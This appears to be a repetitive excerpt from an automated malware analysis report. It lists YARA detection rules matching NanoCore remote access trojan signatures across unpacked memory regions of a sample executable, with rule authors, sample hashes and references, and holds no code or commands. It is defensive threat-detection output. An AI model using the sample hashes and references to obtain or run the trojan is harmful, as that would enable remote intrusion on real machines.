      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
